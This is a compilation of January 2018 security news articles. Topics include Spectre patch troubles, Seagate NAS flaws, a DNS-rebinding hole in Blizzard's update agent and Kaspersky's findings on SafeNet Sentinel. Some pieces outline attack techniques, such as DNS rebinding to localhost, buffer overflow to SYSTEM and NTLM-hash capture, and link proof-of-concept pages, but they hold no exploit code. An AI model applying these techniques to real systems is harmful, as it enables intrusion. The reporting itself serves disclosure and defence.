How%20likely%20are%20employees%20in%20different%20sectors%20to%20fall%20for%20phishing%20attacks

Unsurprisingly, 90 days after undergoing initial training and simulated phishing, the percentage of employees that fell for phishing attacks dropped significantly across all sectors and organizations of all sizes.

For example, in the case of the insurance industry, the phish-prone percentage dropped to 13% in small and large organizations, and 16% in mid-size companies. In the case of nonprofits, it dropped to 16-17%.

After one year of training, the phish-prone percentage dropped to 1-2% in most cases. The highest percentage of employees that still fell for phishing attacks, roughly 5%, was in large organizations in the energy and utilities, financial services, insurance, and education sectors.

“The new research uncovered some surprising and troubling results. However, it also demonstrates the power of deploying new-school security awareness training by lowering a 27 percent Phish-prone result to just over two percent,” said Stu Sjouwerman, CEO of KnowBe4.


SaaS webservice for Seagate’s GoFlex Home Storage devices vulnerable to MiTM and XSS
23.1.2018 securityaffairs
Vulnerebility

Security expert found more than 33000 Seagate’s GoFlex Home network-attached storage (NAS) devices vulnerable exposed online.
Seagate has patched several vulnerabilities in its Personal Cloud and GoFlex products, but unfortunately, some flaws remain unpatched.

In September, researcher Aditya K. Sood discovered vulnerabilities that can be exploited by attackers to launch cross-site scripting (XSS) and man-in-the-middle (MitM) attacks against Seagate GoFlex Home NAS product.

GoFlex Home NAS devices run a web service accessible at seagateshare.com, that allows users to remotely manage the device and its content. Customers can access their storage by providing the device name, and login credentials.

Seagate%E2%80%99s%20GoFlex%20Home%20NAS

The GoFlex firmware runs an HTTP server that requires users to enable port forwarding on their router in order to connect to the web service.

Sood noticed that the HTTP server supports the obsolete protocols SSLv2 and SSLv3, while the web service seagateshare.com service supports SSLv3.

Both protocols expose the users to MiTM attacks, including DROWN and POODLE.

“It has been discovered that embedded server still supports SSLv2 / SSLv3 whereas the
seagateshare.com supports SSLv3. We have looked into 50,000+ devices that are running on unique IPs that have SSLv2/ SSLv3 enabled.” states the analysis published by the expert. “Additionally, during standard tests, we have collected 17000+ URLs of seagateshare.com with unique device_ids.”

The expert also discovered an XSS in the seagateshare.com website that could be exploited by an attacker to execute malicious code in the context of a user’s browsing session by tricking the victim into clicking on a specially crafted link.

The bad news for Seagate users is that the company has only fixed the XSS flaw, it doesn’t plan on fixing the remaining issue related to the use of SSLv2 and SSLv3.


Intel Warns Users Not to Install Its 'Faulty' Meltdown and Spectre Patches
23.1.2018 thehackernews
Vulnerebility
Don't install Intel's patches for Spectre and Meltdown chip vulnerabilities.
Intel on Monday warned that you should stop deploying its current versions of Spectre/Meltdown patches, which Linux creator Linus Torvalds calls 'complete and utter garbage.'
Spectre and Meltdown are security vulnerabilities disclosed by researchers earlier this month in many processors from Intel, ARM and AMD used in modern PCs, servers and smartphones (among other devices), which could allow attackers to steal your passwords, encryption keys and other private information.
Since last week, users are reporting that they are facing issues like spontaneous reboots and other 'unpredictable' system behaviour on their affected computers after installing Spectre/Meltdown patch released by Intel.
Keeping these problems in mind, Intel has advised OEMs, cloud service providers, system manufacturers, software vendors as well as end users to stop deploying the current versions of its patches until the chip giant develops 'a solution to address it.'
"We have now identified the root cause for Broadwell and Haswell platforms, and made good progress in developing a solution to address it," Intel said in a press release published on Monday.
"Over the weekend, we began rolling out an early version of the updated solution to industry partners for testing, and we will make a final release available once that testing has been completed."
Linus Torvalds Calls Intel's Meltdown/Spectre Patches 'Garbage'
Meanwhile, in a public email conversation, Linus Torvalds complains that he is not happy with the Intel's approach of protecting the Linux kernel from Spectre and Meltdown flaws, saying:
"They do literally insane things. They do things that do not make sense... I really don't want to see these garbage patches just mindlessly sent out. … I think we need something better than this garbage." Torvalds said.
Intel patches require users to manually opt-in and enable the fix while their computers boot up when the security patches for such a critical flaw should be applied automatically.
It's because the 'Indirect Branch Restricted Speculation' or IBRS—one of three new hardware patches offered as CPU microcode updates by Intel—is so inefficient that it would result in widespread performance hits if rolled out worldwide.
So in other words, to prevent bad performance in benchmark tests, Intel is offering users to choose between performance and security.
New Intel patches will be available soon. Stay tuned.


Google hacker found a critical flaw in Blizzard Games that expose millions of PCs to DNS Rebinding attacks
23.1.2018 securityaffairs 
Attack

The white hat hacker Tavis Ormandy discovered a severe flaw in Blizzard games that expose millions of PCs to DNS Rebinding attacks.
The notorious white hat hacker Tavis Ormandy at the Google’s Project Zero team made the headlines again, this time he discovered a severe flaw in Blizzard games that could be exploited by remote attackers to run malicious code on gamers’ computers.

The impact of the discovery is potentially amazing, millions of PC are at risk. Every month, roughly half a billion users play popular online games created by Blizzard Entertainment, including World of Warcraft, Overwatch, Diablo III, Hearthstone and Starcraft II.

blizzard%20games

Play the Blizzard games is very simple, players just need to install a client application, called ‘Blizzard Update Agent.‘ The application runs JSON-RPC server over HTTP protocol on port 1120, and “accepts commands to install, uninstall, change settings, update and other maintenance related options.”

“All blizzard games are installed alongside a shared tool called “Blizzard Update Agent”, investor.activision.com claims they have “500 million monthly active users”, who presumably all have this utility installed.” wrote Ormandy on a Chromium thread. “The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc’s are from a legitimate source”

Ormandy demonstrated that the Blizzard Update Agent is vulnerable to ‘DNS Rebinding’ attack that allows any website to create a dns name that they are authorized to communicate with, and then make it resolve to localhost.

The local Blizzard updater service fails to validate what hostname the client was requesting and responds to such requests.

Practically, the website poses itself as a bridge between the external server and your localhost, “this means that *any* website can send privileged commands to the agent.”

The attackers can launch a DNS Rebinding attack to create a DNS entry to bind any attacker-controlled web page with 127.0.0.1 and trick users into visiting it, with this technique a hacker can remotely send privileged commands to the Blizzard Update Agent using JavaScript code.

Ormandy published a proof-of-concept exploit that executes DNS rebinding attack against Blizzard clients.

“I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames: https://lock.cmpxchg8b.com/rebinder.html Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:

$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1" wrote Ormandy.
“Exploitation would involve using network drives, or setting destination to “Downloads” and making the browser install dlls, datafiles, etc. I made a very simple demo, I’m sure it’s quite brittle, but hopefully you get the idea! http://lock.cmpxchg8b.com/yah4od7N.html See screenshot attached of how it’s supposed to look.”

Blizzard%20Games%20Blizzard%20Update%20Agent%20is%20vulnerable%20DNS%20Rebinding

Ormandy reported the flaw to Blizzard in December, but after initially communication, Blizzard stopped responding his messages. According to the expert, the companyrolled out just partial mitigation in the client version 5996.

Ormandy was disappointed about the company’s behavior.

“Blizzard were replying to emails, but stopped communicating on December 22nd. Blizzard are no longer replying to any enquiries, and it looks like in version 5996 the Agent now has been silently patched with a bizarre solution.” wrote the expert.

“Their solution appears to be to query the client command line, get the 32-bit FNV-1a string hash of the exename and then check if it’s in a blacklist. I proposed they whitelist Hostnames, but apparently that solution was too elegant and simple. I’m not pleased that Blizzard pushed this patch without notifying me, or consulted me on this.”

Once Ormandy publicly disclosed the issue, Blizzard informed him that it addressed the bug with a more robust Host header whitelist fix that is currently under validation in a QA environment.


A silver bullet for the attacker
23.1.2018 Kaspersky  ICS
In the past years, the problem of vulnerabilities in industrial automation systems has been becoming increasingly important. The fact that industrial control systems have been developing in parallel with IT systems, relatively independently and often without regard for modern secure coding practices is probably the main source of ICS security problems. As a result of this, numerous custom solutions have appeared, including proprietary network protocols and algorithms for authentication and encryption. It is these solutions that were the main source of threats discovered by ICS IT security researchers. At the same time, we can see that industrial automation systems derive some of their problems from common technologies (examples include CodeSys Runtime, Microsoft Windows vulnerabilities, etc.).

Companies attach different priority levels to such problems and the risks associated with them. It is obvious for everybody that vulnerability information should never be disclosed until a patch is released. However, many companies believe that this information should not be published even when a patch is available. For software developers, this is always a blow to their reputation. And companies that use vulnerable systems are not always physically able to install a patch or this installation may involve significant costs (interrupted operation of the systems to be updated, the cost of work related to installing updates, etc.).

We assess risks based on our experience of a security system developer and supplier. We are convinced that it is absolutely essential to inform users of vulnerable software about the new threat and the need to update their software as soon as possible. This certainly does not guarantee that all users of vulnerable systems will promptly update them and the threat will go away. However, in our experience, if this is not done very few users update their systems in a timely manner, even if patches are available. We confront hundreds of thousands of new threats every day and we can see that threat actors are on a constant lookout for new attack opportunities. And we realize that by keeping silent about problems we give those threat actors a chance.

This is why we decided to share information on one of our discoveries: according to our research, connecting a software license management token to a computer may open a hidden remote access channel for an attacker.

Why we decided to analyze SafeNet Sentinel
While performing various penetration tests, Kaspersky Lab ICS CERT experts repeatedly encountered the same service on the computers of customers who used software and hardware solutions by different industrial vendors. The experts didn’t attach much importance to it until it was found to be vulnerable. The service was hasplms.exe, which is part of the SafeNet Sentinel hardware-based solution by Gemalto. The solution provides license control for software used by customers and is widely used in ICS and IT systems.

The solution’s software part consists of a driver, a web application and a set of other software components. The hardware part is a USB token. The token needs to be connected to a PC or server on which a software license is required. Some of the USB token models are listed in the table below.

License control solutions of this type are based on the following operating principles: a software product requires a license to operate properly; when a USB token is plugged into the computer, the software “sees” the license and becomes fully functional. The token must be plugged in every time the software is started and remain connected while it is in use. The software part of the Gemalto solution is installed once and remains functional regardless of the life cycle of the software requiring a token.

This Gemalto solution is used in products by other software vendors, including such companies as ABB, General Electric, HP, Cadac Group, Zemax and many other organizations, the number of which, according to some estimates, reaches 40 thousand.

According to the results of independent research conducted by Frost and Sullivan in 2011, SafeNet Sentinel, which is currently owned by Gemalto, has a 40% market share for license control solutions in North America and over 60% in Europe.

The number of end users who use Gemalto solutions is not known. However, if each company has 100 clients, the number of users is in the millions. Unfortunately, few people realize that connecting a token to a computer to control licenses may not be a safe thing to do.

Vulnerabilities and attack vectors
From researchers’ viewpoint, hasplms.exe exhibited a rather curious behavior in the system: it could be remotely accessed and communicated with on open port 1947. The protocol type was defined by the network packet header – either HTTP or a proprietary binary protocol was used. The service also had an API of its own, which was based on the HTTP protocol.

Analyzing the service was made more difficult by the fact that the binary file used a VMProtect-type protector and generated its bytecode from the original Gemalto code. Due to this, it was decided to use fuzzing as the main tool for analyzing the vulnerable service’s behavior.

First of all, we looked at the localization function – the user could download language packs consisting of two files, one of which was localize.xml. The second file, in HTML format, had parameters, one of which turned out to be vulnerable to buffer overflow. It would have been a simple vulnerability, if it wasn’t for one curious detail: although, as mentioned above, a protector was used, for some reason the developers did not use any of the classical mechanisms providing protection from such binary vulnerabilities (such as Stack Canary, Stack Cookie, ASLR, etc.). As a result, a simple buffer overflow could allow an attacker to execute arbitrary code on the remote system.

Note that such software development flaws are very rare in modern solutions. As a rule, secure coding practices are implemented when developing serious commercial products (such as SDL – security development lifecycle), which means that security is designed into applications at the development stage, rather than being implemented as an additional option.

This attack vector can be used without LPE (local privilege escalation) – the vulnerable process runs with SYSTEM privileges, enabling malicious code to run with the highest privileges.

Sample script loading a language pack file

Result of Buffer Overflow exploitation, leading to RCE

The vulnerability was assigned the number CVE-2017-11496.

This was just one of the vulnerabilities we found. And the overall result of our research was disquieting.

In late 2016 – early 2017, 11 vulnerabilities were identified: two allowed remote code execution if exploited and nine were denial-of-service vulnerabilities.

By June 2017, Kaspersky Lab ICS CERT had identified three more vulnerabilities: an XML bomb and two denial-of-service flaws, one of which could potentially lead to remote execution of arbitrary code.

In total, 14 vulnerabilities have been identified, all quite dangerous (for example, exploitation of each of the Remote Execution of Arbitrary Code type vulnerabilities is automatically performed with SYSTEM privileges, i.e., the highest privilege level in Windows).

All attack vectors affecting the vulnerable service were multi-stage.

We promptly sent all information on the vulnerabilities identified to Gemalto. The vulnerabilities were assigned the following respective CVE numbers:

CVE-2017-11496 – Remote Code Execution
CVE-2017-11497 – Remote Code Execution
CVE-2017-11498 – Denial of Service
CVE-2017-12818 – Denial of Service
CVE-2017-12819 – NTLM hash capturing
CVE-2017-12820 – Denial of Service
CVE-2017-12821 – Remote Code Execution
CVE-2017- 12822 – Remote manipulations with configuration files
In addition to vulnerability descriptions, we sent a description of peculiar functionality to Gemalto.

Peculiar functionality
Kaspersky Lab ICS CERT experts have found that hasplms.exe has some rather unusual functionality:

When a Gemalto USB token is first connected to a computer (even if the active session is blocked), a driver and service that accepts network connections on port 1947 are installed if the Internet access is available.
If a driver is manually downloaded from the Gemalto website and installed, a driver and service that accept network connections on port 1947 are installed and port 1947 is added to Windows firewall exceptions.
If Gemalto software is installed as part of a third-party installation file, port 1947 is also added to Windows firewall exceptions.
There is an API function which enables or disables the administrative panel in the web interface, making it possible to modify the settings of the program part of the SafeNet Sentinel hardware-based solution. The panel is available by default on the localhost IP address – 127.0.0.1.
The API can be used to change the internal proxy settings for updating language packs.
After changing the proxy server, the service’s internal logic can be used to obtain the NTLM hash of the user account under which the hasplms.exe process is running (i.e., SYSTEM).
This appears to be an undocumented feature and can be used for stealthy remote access. This means that remote attackers can use these capabilities to gain access to the administrative panel of the Gemalto software, carry out attacks with system user privileges and conceal their presence after completing these attacks.

As mentioned above, Gemalto representatives were informed of this attack vector.

Non-transparent security
Solutions, technologies or individual software modules used by many third-party vendors often do not undergo proper security testing. This potentially opens up new attack vectors. At the same time, closing vulnerabilities in such products, which are often used, among other applications, in banking and industrial control systems, is not always a smooth process: for some reason, vendors of such systems are in no hurry to notify their users of problems identified in their products.

In early 2017, we sent information about 11 vulnerabilities we had identified to Gemalto. It was only in late June that, in response to our repeated requests, the vendor informed us that a patch had been released and information about the vulnerabilities that had been closed, as well as a new version of the driver, could be found on the company’s internal user portal.

On June 26, we informed Gemalto of the suspicious functionality and of three more vulnerabilities. This time, things went quicker: on July 21 the vendor released a private notice on a new driver version – without any mention of the vulnerabilities closed.

According to Gemalto, the company has notified all of its customers of the need to update the driver via their account dashboards. However, this was apparently not sufficient: after we published information about the vulnerabilities identified, we were contacted by several developers of software which uses hasplms. It became clear from our communication with them that they were not aware of the problem and continued to use versions of the product with multiple vulnerabilities.

Update software to the current version (7.6) ASAP
We urge those users and companies that use Gemalto’s SafeNet Sentinel to install the latest (secure) version of the driver as soon as possible or contact Gemalto for instructions on updating the driver. We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes.

In the case of installing the driver via Microsoft Windows Update servers, we recommend checking hasplms.exe to make sure it is the latest version. If an obsolete version is used, it is crucial to install the latest (secure) version of the driver from the vendor’s website or contact Gemalto for instructions on updating the driver.

We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes. This will help to reduce the risk of the vulnerabilities being exploited.

Some software vendors who use third-party solutions as part of their products may be very thorough about the security of their own code, while leaving the security of third-party solutions to other companies (the vendors of these solutions). We very much hope that most companies act responsibly both with respect to their own solutions and with respect to third-party solutions used in their products.


Critical Flaw in All Blizzard Games Could Let Hackers Hijack Millions of PCs
23.1.2018 thehackernews
Vulnerebility


A Google security researcher has discovered a severe vulnerability in Blizzard games that could allow remote attackers to run malicious code on gamers’ computers.
Played every month by half a billion users—World of Warcraft, Overwatch, Diablo III, Hearthstone and Starcraft II are popular online games created by Blizzard Entertainment.
To play Blizzard games online using web browsers, users need to install a game client application, called 'Blizzard Update Agent,' onto their systems that run JSON-RPC server over HTTP protocol on port 1120, and "accepts commands to install, uninstall, change settings, update and other maintenance related options."
Google's Project Zero team researcher Tavis Ormandy discovered that the Blizzard Update Agent is vulnerable to a hacking technique called the "DNS Rebinding" attack that allows any website to act as a bridge between the external server and your localhost.
Just last week, Ormandy revealed a similar vulnerability in a popular Transmission BitTorrent app that could allow hackers to remotely execute malicious code on BitTorrent users' computers and take control of them.
By simply creating a DNS entry to bind any attacker-controlled web page with localhost (127.0.0.1) and tricking users into visiting it, hackers can easily send privileged commands to the Blizzard Update Agent using JavaScript code.
Although a random website running in a web browser usually cannot make requests to a hostname other than its own, the local Blizzard updater service does not validate what hostname the client was requesting and responds to such requests.
Blizzard DNS Rebinding Attack — Proof of Concept Exploit
Ormandy has also published a proof-of-concept exploit that executes DNS rebinding attack against Blizzard clients and could be modified to allow exploitation using network drives, or setting destination to "downloads" and making the browser install malicious DLLs, data files, etc.
Ormandy responsibly reported Blizzard of the issue in December to get it patched before hackers could take advantage of it to target hundreds of millions of gamers.
However, after initially communication, Blizzard inappropriately stopped responding to Ormandy's emails and silently applied partial mitigation in the client version 5996.
"Blizzard was replying to emails but stopped communicating on December 22nd. Blizzard is no longer replying to any enquiries, and it looks like in version 5996 the Agent now has been silently patched with a bizarre solution," Ormandy says.
"Their solution appears to be to query the client command line, get the 32-bit FNV-1a string hash of the exename and then check if it's in a blacklist. I proposed they whitelist Hostnames, but apparently, that solution was too elegant and simple. I'm not pleased that Blizzard pushed this patch without notifying me, or consulted me on this."
After the Ormandy's report went public, Blizzard contacted and informed him that a more robust Host header whitelist fix to address the issue entirely is currently being developed for deployment.
Ormandy is also checking other big games vendors with a user base of over 100 Million to see if the problem can be replicated.


Nearly Half of the Norway Population Exposed in HealthCare Data Breach
23.1.2018 thehackernews BigBrothers

Cybercriminals have stolen a massive trove of Norway's healthcare data in a recent data breach, which likely impacts more than half of the nation's population.
An unknown hacker or group of hackers managed to breach the systems of Health South-East Regional Health Authority (RHF) and reportedly stolen personal info and health records of some 2.9 million Norwegians out of the country's total 5.2 million inhabitants.
Health South-East RHA is a healthcare organisation that manages hospitals in Norway’s southeast region, including Østfold, Akershus, Oslo, Hedmark, Oppland, Buskerud, Vestfold, Telemark, Aust-Agder and Vest-Agder.
The healthcare organisation announced the data breach on Monday after it had been alerted by HelseCERT, the Norwegian CERT department for its healthcare sector, about an "abnormal activity" against computer systems in the region.
HelseCERT also said the culprits behind the data breach are "advanced and professional" hackers, although it is still unknown as to whether they were managed to exfiltrate data successfully and if so, how many people may have been impacted.
So far there's also no evidence if the stolen data theft has had any consequences for or effects on patients' safety. However, the healthcare organisation assured that security "measures had been taken to limit the damage caused by the burglary."
"We are in a phase where we try to get an overview. It's far too early to say how big the attack is. We are working to acquire knowledge of all aspects, " NorCERT director Kjetil Nilsen told Norwegian publication VG.
"Everything indicates that it is an advanced player who has the tools and ability to perform such an attack. It can be advanced criminals. There is a wide range of possibilities."
Why Do Hackers Want Your Health Data?
Digital healthcare has been growing to satisfy the demands of connected healthcare technology that provides better treatment and improved patient care.
We know that any organisation with a computer is at risk from cyber-attacks both from criminals wanting to extort money and state-sponsored hackers wanting to cause chaos.
Since the healthcare sector is part of the critical national infrastructure, alongside water, electricity and transport, it becomes an attractive target for hackers.
Believe it or not, your medical records are worth more to hackers than your stolen credit card details on the dark web markets.
Financial data has a finite lifespan, but the information contained in health care records—which includes names, birth dates, policy numbers, diagnosis codes, social security number and billing information—has a much longer shelf life and is rich enough for identity theft.
Fraudsters can use this data to create fake identities to do all illegal kinds of stuff in your name, combine a patient number with a false provider number and file fake claims with insurers, and even file fake tax returns using your stolen addresses, phone numbers and employment history.
How to Protect Yourself After a Data Breach?
If you are a one of those affected by the healthcare breach, you will have to remain vigilant against fraud for the rest of your lives, because the risk of identity theft isn't short term, unlike in case of credit cards fraud.
You may follow the following steps to protect yourself:
1) Monitor Your Accounts: Watch out if someone using your information do not ever try to take over or transfer money out of your existing accounts. Don’t forget that thieves with stolen details on you can get through your security questions, including the last four digits of your social and street address. Also, watch for any unauthorised activity or transfers on your current financial accounts.
2) File Your Taxes Early: With the stolen information in the hands, cyber thieves could hook your tax refund by filing your taxes early and claiming it for themselves. So, to avoid any such problems, file your taxes as early as possible.
3) Stay Vigilant: The foremost thing to protect against any breach is to stay vigilant, as nobody knows when or where your stolen identities will be used. So, affected consumers will simply have to stay mindful forever.


Linus Torvalds calls the Linux Spectre patches “UTTER GARBAGE”
23.1.2018 securityaffairs
Vulnerebility

The popular Linus Torvalds harshly criticizes the Spectre patches issued by Intel to patch the Spectre variant 2 flaw affecting its processor chips.
Security experts harshly criticize the patch issued by Intel to patch the Spectre variant 2 flaw affecting its processor chips.

Intel has decided to do not disable the prediction feature in future chips until the company will implement design changes in microarchitecture, but this means that the shipped chips will be “vulnerable by default” and will include a protection flag that can be set by software.

Intel published a technical note about the mitigation of the Spectre flaw

Intel explained its approach in its technical note about Spectre mitigation (“Speculative Execution Side Channel Mitigations“), the tech giant addressed the issue with an opt-in flag dubbed IBRS_ALL bit (IBRS states for Indirect Branch Restricted Speculation).

The famous Linus Torvalds expressed in an email to the Linux Kernel mailing list his disappointment, he defined the Linux Spectre Patches “UTTER GARBAGE”

“All of this is pure garbage. Is Intel really planning on making this shit architectural?” he wrote. “Has anybody talked to them and told them they are f*cking insane? Please, any Intel engineers here – talk to your managers.”

“They do literally insane things. They do things that do not make sense … The patches do things that are not sane.

WHAT THE F*CK IS GOING ON?”

Spectre patches

The Indirect Branch Restricted Speculation, along with Single Thread Indirect Branch Predictors (STIBP) and Indirect Branch Predictor Barrier (IBPB), prevent the abuse of the prediction feature and the exploitation of the flaw.

Torvalds speculate the Intel’s decision to address the issues in this way is mainly motivated by the intention to avoid legal liability. Recalling two decades of flawed chips would have a catastrophic impact on the tech giant.

Torvalds explained that the impact of using IBRS on existing hardware is so severe that no one will set the hardware capability bits.

“Nobody sane will use them, since the cost is too damn high,” he said.

Of course, the impact on the performance depends on the hardware and workload involved.

Let me close with an abstract from the Linus Torvalds’s email:

“That’s part of the big problem here. The speculation control cpuid stuff shows that Intel actually seems to plan on doing the right thing for meltdown (the main question being _when_). Which is not a huge surprise, since it should be easy to fix, and it’s a really honking big hole to drive through. Not doing the right thing for meltdown would be completely unacceptable.

So the IBRS garbage implies that Intel is _not_ planning on doing the right thing for the indirect branch speculation.

Honestly, that’s completely unacceptable too.” wrote Torvalds.

“Have you _looked_ at the patches you are talking about? You should have – several of them bear your name.

The patches do things like add the garbage MSR writes to the kernel entry/exit points. That’s insane. That says “we’re trying to protect the kernel”. We already have retpoline there, with less overhead.

So somebody isn’t telling the truth here. Somebody is pushing complete garbage for unclear reasons. Sorry for having to point that out.

If this was about flushing the BTB at actual context switches between different users, I’d believe you. But that’s not at all what the patches do.

As it is, the patches are COMPLETE AND UTTER GARBAGE.

They do literally insane things. They do things that do not make sense. That makes all your arguments questionable and suspicious. The patches do things that are not sane.

WHAT THE F*CK IS GOING ON?”


Three Sonic apps in the Google Play are leaking data to uncertified servers
23.1.2018 securityaffairs Android

According to a researcher from security firm Predeo, three Sonic apps in the Google Play published by SEGA leak users’ data to uncertified servers.
According to a researcher from security firm Predeo, some game applications in the Google Play published by SEGA leak users’ data to uncertified servers.

The Android apps are Sonic Dash, Sonic the Hedgehog™ Classic, and Sonic Dash 2: Sonic Boom, that have been totally downloaded millions of times.

The expert discovered that the apps are leaking users’ geolocation and device data to suspicious servers, thereby posing a privacy threat to mobile gamers, according to researchers.

“Pradeo’s Lab discovered that some game applications in the Google Play published by SEGA, the famous video games developer and publisher, access and leak users’ geolocation and device data. Hundreds of millions of users are concerned by these data privacy violations.” states the blog post published by Pradeo.

sonic-apps

The Sonic apps send data to an average of 11 distant servers, three of which are not certified. Most of the servers obviously collect data for marketing purposes, but the expert observed that two of the three uncertified servers are linked to a potential unwanted library app dubbed Android/Inmobi.D,

Android.InMobi is classified as an advertisement library that is bundled with certain Android applications.

The expert discovered that the Sonic apps also leak mobile network information, including the service provider name, network type, and device information (i.e. manufacturer, commercial name, battery level, the maximum level of the battery, and operating system version number).

The researchers at Pradeo also conducted a vulnerability assessment for the three Sonic App and discovered an average of 15 OWASP (Open Web Application Security Project) flaws.

Experts discovered two critical flaws, X.509TrustManager and PotentiallyByPassSslConnection, that could be exploited by hackers to power man-in-the-middle attacks due to the lack of validation for SSL certificate errors.

“Unsafe implementation of the interface X509TrustManager. Specifically, the implementation ignores all SSL certificate validation errors when establishing an HTTPS connection to a remote host, thereby making your app vulnerable to man-in-the-middle attacks. An attacker could read transmitted data (such as login credentials) and even change the data transmitted on the HTTPS connection.” reads the description for the X.509TRUSTMANAGER flaw, while the POTENTIALLY_BYPASS SSL_CONNECTION is described as:

“The implementation bypasses all SSL certificate validation errors when establishing an HTTPS connection to a remote host, thereby making your app vulnerable to man-in-the-middle attacks. An attacker could read transmitted data (such as login credentials) and even change the data transmitted on the HTTPS connection.”

I suggest you read the post to discover the remaining issues and the risks they posed to the users.


Seagate Patches Flaws in Personal Cloud, GoFlex Products
22.1.2018 securityweek
Vulnerebility
Seagate recently patched several vulnerabilities discovered by researchers in the company’s Personal Cloud and GoFlex products, but some weaknesses impacting the latter remain unfixed.

GoFlex Home vulnerabilities

In late September 2017, researcher Aditya K. Sood discovered vulnerabilities that can be exploited for cross-site scripting (XSS) and man-in-the-middle (MitM) attacks in Seagate’s GoFlex Home network-attached storage (NAS) product.

GoFlex users are provided a web service, accessible at seagateshare.com, that allows them to remotely manage the product and upload files to the cloud. The service can be accessed using the name of the device, a username, and a password. An HTTP server present in the GoFlex firmware requires port forwarding on the user’s router in order to connect to the web service.Vulnerabilities in Seagate GoFlex

Sood discovered that the embedded server still supports SSLv2 and SSLv3, and the seagateshare.com service supports SSLv3. SSLv2 and SSLv3 are obsolete protocols that are known to be vulnerable to MitM attacks, including via the methods known as DROWN and POODLE.

The expert has identified more than 50,000 Seagate devices – hosted on unique IP addresses – that have SSLv2 and SSLv3 enabled.

Sood also noticed that the unique name (device_id) of each device is not difficult to find. During the tests he conducted, the expert managed to collect more than 17,000 unique device IDs.

Another security hole found by the researcher is an XSS affecting the seagateshare.com website. An attacker could have exploited this vulnerability to execute malicious code in the context of a user’s browsing session by getting the victim to click on a specially crafted link.

While Seagate has fixed the XSS vulnerability, the company told Sood it does not plan on addressing the issue related to the use of SSLv2 and SSLv3.

The researcher disclosed his findings on Monday. Additional technical details on the vulnerabilities are available on his blog.

Vulnerabilities%20in%20Seagate%20Personal%20Cloud%20NAS%20device

Securify researcher Yorick Koster also disclosed recently a couple of vulnerabilities he discovered in Seagate products. Specifically, he found that Personal Cloud NAS devices are affected by command injection and file deletion flaws.

The security holes affect the Seagate Media Server application, which allows users to easily access their photos, music and movies. The app can be accessed without authentication and unauthenticated users can upload files using a Public folder.Vulnerabilities in Seagate Personal Cloud NAS device

The command injection vulnerabilities, tracked as CVE-2018-5347, allow an unauthenticated attacker to run arbitrary commands with root privileges. The security holes can be exploited remotely via cross-site request forgery (CSRF) attacks even if a device is not directly connected to the Internet.

Koster also found that the Media Server app is affected by a vulnerability that allows an unauthenticated attacker to delete arbitrary files and folders from the NAS device. Since CSRF protections are missing, this flaw can also be exploited remotely by getting the targeted user to access a specially crafted website.

The vulnerabilities discovered by Koster were patched by Seagate on December 11 with the release of firmware version 4.3.18.0. Separate advisories detailing the command injection and file deletion flaws, including proof-of-concept (PoC) code, were published earlier this month.


Intel Halts Spectre, Meltdown CPU Patches Over Unstable Code
22.1.2018 securityweek
Vulnerebility
Intel on Monday said that users should stop deploying patches for the “Spectre” and “Meltdown” chip vulnerabilities disclosed by researchers earlier this month, saying the patches could cause problems in affected devices, including higher than expected reboots and other “unpredictable” system behavior.

The US chip giant recommended that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions of the patches.

"We have now identified the root cause of the reboot issue impacting Broadwell and Haswell platforms, and made good progress in developing a solution to address it," Navin Shenoy, Intel data center group executive vice president, wrote in security update.

"We ask that our industry partners focus efforts on testing early versions of the updated solution so we can accelerate its release," Shenoy added.

Last Wednesday, Intel shared information on the performance impact of the inital Meltdown and Spectre patches on data centers, and the company did warn customers that systems with several types of processors may experience more frequent reboots after firmware updates are installed.

Shenoy said that Intel expects to share more details on the timing of new patches later this week.

As technology firms rush out fixes to address the security risks, many of the updates have turned out to be unstable.
Red Hat has also decided to pull microcode patches for one variant of the Spectre exploit after users complained that updates had caused their systems to stop booting.

The updates initially released by Microsoft caused some systems using AMD processors to stop booting. Some systems running Ubuntu also failed to boot after Canonical’s first round of updates was installed.

Several industrial control systems (ICS) vendors have advised customers not to apply them before conducting thorough tests.

VMware also decided to delay new releases of microcode updates until Intel addresses these problems.


SamSam Ransomware Attacks Hit Healthcare Firms
22.1.2018 securityweek
Ransomware
Two SamSam Ransomware Healthcare Attacks, Two Variants, and Two Different Results

Earlier this month, Hancock Health, headquartered in Greenfield, Indiana, was infected with the SamSam ransomware. This past weekend, Allscripts -- a major electronic health record (EHR) company headquartered in Chicago, IL -- confirmed that it had also been hit by Ransomware, which it described as a SamSam (also known as Samas) variant.

The methodologies employed in each attack are different. SamSam is not usually delivered by email phishing. It is more usually introduced after the target has already been breached. This method was described in the Symantec Internet Security Threat Report V22 : "In the case of SamSam (Ransom.SamSam) the attackers’ initial point of entry was a public-facing web server. They exploited an unpatched vulnerability to compromise the server and get a foothold on the victim’s network."

This bears a strong similarity to what we know about the attack against Hancock Health, Greenfield, disclosed last week. The Greenfield Reporter wrote, "...the hacker gained access to the system by using the hospital’s remote-access portal, logging in with an outside vendor’s username and password. The attack was not the result of an employee opening a malware-infected email."

On Jan. 15, Hancock released a statement saying, "At approximately 9:30 PM on Thursday, January 11, 2018, an attack on the information systems of Hancock Health was initiated by an as-yet unidentified criminal group."

One day later it announced that it had decided to pay the ransom. CEO, Steve Long, said, "Restoring from backup was considered, though we made the deliberate decision to pay the ransom to expedite our return to full operations.” Payment was made on Friday, January 12, and, "By Monday, January 15, 2018, critical systems were restored to normal production levels and the hospital was back online."

Last Friday (Jan. 19) Long posted a more detailed description of the events. He confirmed that the malware was SamSam, and that it had been a supply chain attack via a provider of ICS equipment to the hospital. The attackers targeted Hancock's remote emergency IT backup facility and used the connections from there to gain access to the primary facility -- targeting files associated with the most critical information systems in the hospital.

